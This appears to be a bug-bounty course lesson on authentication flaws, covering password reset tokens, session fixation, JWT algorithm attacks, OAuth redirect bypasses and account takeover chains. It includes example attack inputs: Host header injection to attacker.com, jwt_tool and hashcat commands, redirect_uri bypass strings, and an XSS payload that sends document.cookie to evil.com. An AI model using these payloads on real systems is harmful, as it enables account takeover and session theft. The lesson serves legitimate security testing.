Authentication & Session Flaws

Authentication Failures is #7 on OWASP Top 10:2025. Weak authentication leads to account takeover, the most impactful bug class for users.

Password Reset Vulnerabilities

Token Leakage

# Check if token appears in Referer header
1. Request password reset
2. Click reset link
3. Page loads external resource (image, script)
4. Token leaked in Referer header

# Check token in URL vs POST body
# URL tokens can leak via browser history, logs

Weak Tokens

# Test token predictability
# Request multiple resets, compare tokens
Token 1: abc123def456
Token 2: abc123def457  # Sequential = predictable!

# Test token reuse
# Can old tokens still work?
# What's the expiration time?

Host Header Injection

# Inject malicious host in reset request
POST /reset-password HTTP/1.1
Host: attacker.com
X-Forwarded-Host: attacker.com

# If email contains: https://attacker.com/reset?token=xxx
# User clicks → token sent to attacker

Session Management

Session Fixation

# Can you set session ID before login?
1. Attacker visits site, gets session ID: ABC123
2. Attacker sends victim link with session ID
3. Victim logs in with attacker's session ID
4. Attacker now has authenticated session

# Test:
# Does session ID change after login?
# Can you set session via URL parameter?

Session Token Analysis

# Check cookie security flags
Set-Cookie: session=xyz;
# Missing HttpOnly → XSS can steal
# Missing Secure → HTTP interception
# Missing SameSite → CSRF vulnerable

# Analyze token entropy
# Short tokens = brute forceable
# Sequential = predictable
# Timestamp-based = predictable

JWT Vulnerabilities

Algorithm Confusion

# Change algorithm to 'none'
# Original header
{"alg": "RS256", "typ": "JWT"}

# Modified header (base64 encode)
{"alg": "none", "typ": "JWT"}

# Send without signature
<header>.<payload>.

Key Confusion Attack

# RS256 → HS256 attack
# Server uses public key for RS256 verification
# Attack: Sign with HS256 using public key as secret

# Tools
jwt_tool <token> -X a  # Algorithm attacks
jwt_tool <token> -I -pc user -pv admin  # Payload injection

Common JWT Issues

Issue	Test
None algorithm	Set alg to "none"
Weak secret	Brute force with hashcat
No expiration	Check for missing "exp" claim
Sensitive data in payload	Base64 decode, check contents

# Crack weak JWT secrets
hashcat -a 0 -m 16500 jwt.txt wordlist.txt

OAuth/SSO Vulnerabilities

Open Redirect in OAuth

# Manipulate redirect_uri
/oauth/authorize?redirect_uri=https://evil.com/callback

# Bypass validation
redirect_uri=https://legit.com.evil.com
redirect_uri=https://legit.com%40evil.com
redirect_uri=https://legit.com/callback/../../../evil

CSRF in OAuth Flow

# Missing state parameter
# Attack: Send victim OAuth URL without state
# Victim's account linked to attacker's identity

Token Leakage

# Access token in URL fragment
# Check browser history, Referer leakage
# Check if access_token appears in server logs

Account Takeover Chains

Example Chain: Password Reset + IDOR

1. Find IDOR in user settings
2. Change victim's email to attacker's
3. Request password reset
4. Reset link sent to attacker
5. Account takeover achieved

Example Chain: XSS + Session Hijacking

1. Find stored XSS in profile
2. Inject: <script>fetch('https://evil.com/?c='+document.cookie)</script>
3. Victim views profile
4. Session cookie exfiltrated
5. Login as victim

Testing Checklist

Password reset token predictability
Token expiration and reuse
Host header injection in reset emails
Session ID regeneration after login
Cookie security flags (HttpOnly, Secure, SameSite)
JWT algorithm vulnerabilities
OAuth redirect_uri validation
OAuth state parameter presence

Bounty Examples

Bug	Company	Bounty
JWT none algorithm	Auth0	$10,000
Password reset token leak	Twitter	$5,040
OAuth redirect bypass	Facebook	$7,500
Session fixation	Shopify	$3,000

Pro Tip: Authentication bugs often require chaining. A low-severity information disclosure + authentication flaw = critical account takeover.

Next, we'll explore Server-Side Request Forgery (SSRF). :::

Quiz